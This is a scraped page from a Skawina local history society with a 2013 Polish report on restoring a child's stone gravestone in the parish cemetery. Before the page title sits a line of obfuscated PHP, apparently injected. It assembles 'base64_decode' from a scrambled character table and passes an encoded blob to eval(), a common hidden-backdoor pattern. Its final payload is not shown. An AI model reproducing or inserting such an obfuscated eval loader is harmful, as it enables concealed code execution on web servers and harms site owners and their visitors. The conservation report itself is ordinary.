$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> SPRAWOZDANIE Z PRZEBIEGU PRAC KONSERWATORSKICH KAMIENNEGO NAGROBKA OLEŃKI LEWIK NA CMENTARZU PARAFIALNYM W SKAWINIE | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

SPRAWOZDANIE Z PRZEBIEGU PRAC KONSERWATORSKICH KAMIENNEGO NAGROBKA OLEŃKI LEWIK NA CMENTARZU PARAFIALNYM W SKAWINIE

data dodania: 3 czerwca 2013

Lista ocalonych od zniszczenia grobów na Skawińskich cmentarzach, powiększyła się o kolejną pozycję. Towarzystwo Przyjaciół Skawiny, dzięki środkom pozyskanym podczas kwest, zleciło wykonanie prac konserwatorskich na nagrobku Oleńki Lewik. Poniżej przedstawiamy ich przebieg.

KRÓTKI OPIS IKONOGRAFICZNY:

Nagrobek o charakterze słupowym wykonany został: podstawa z kamienia piaskowca, przypuszczalnie z kamieniołomu w Barwałdzie Dolnym k/ Kalwarii Zebrzydowskiej, stylizowany krzyż z amorkiem z wapienia pińczowskiego. Fundatorem była rodzina Lewików.

Postument na rzucie prostokąta nawiązujący do dziko ułożonych ciosów kamienia. Na froncie prostokątna tablica z czarnego marmuru z inskrypcją;

OLEŃKA

NAJDROŻSZE DZIECIĘ

STANISŁAWA I BRONISŁAWY

LEWIKÓW

 *11/10 1910 + 3/1 1913r

PRZEBIEG PRAC KONSERWATORSKICH:

Rzeźbę nagrobka przewieziono do pracowni konserwatorskiej. Następnie odkuto od podstawy nagrobka dolną część rzeźby.

Usunięto wtórne uzupełnienia cementowe. Odczyszczono powierzchnię rzeźby szczotką i pędzlem. W miejscu przełamania, nawiercono otwory, wmontowano metalowy sztyft ze stali nierdzewnej i całość sklejono przy użyciu kleju z żywicy epoksydowej. Przystąpiono do rekonstrukcji kończyn dolnych, wklejono druty ze stali nierdzewnej. Usunięto czarną uszczelniającą patynę, zielone mchy i inne zabrudzenia. Powierzchnię kamienia nasączono 2% roztworem kwasu fluorowodorowego a następnie umyto przy użyciu kerchera. Po rekonstrukcji nóg, uzupełniono ubytki szaty oraz fragmentów ramion krzyża i nadano odpowiednią fakturę.

Na Cmentarzu zdemontowano i podniesiono podstawę. Wykonano szlunek z desek o wymiarach 41×61 cm, wylano fundament z zaprawy cementowej. Ułożono izolację i ustawiono podstawę nagrobka. Z powierzchni podstawy usunięto zabrudzenia i uszczelniającą patynę. Na kamiennym, postumencie posadowiono rzeźbę.

Teren wokół nagrobka uporządkowano. Kwaterę ziemną zgodnie z wcześniejszym wyglądem zrekonstruowano, wyznaczono krawężnikami i posadzono kwiatki. Wokół nagrobka podsypano suchą zaprawę i ułożono kostkę granitową. Cały nagrobek został zaimpregnowany preparatem hydrofobowym Sarsil H-14, który rabezpiecza kamień przed wilgocią

Litery na tablicy inskrypcyjnej pozłocono złotem mineralnym.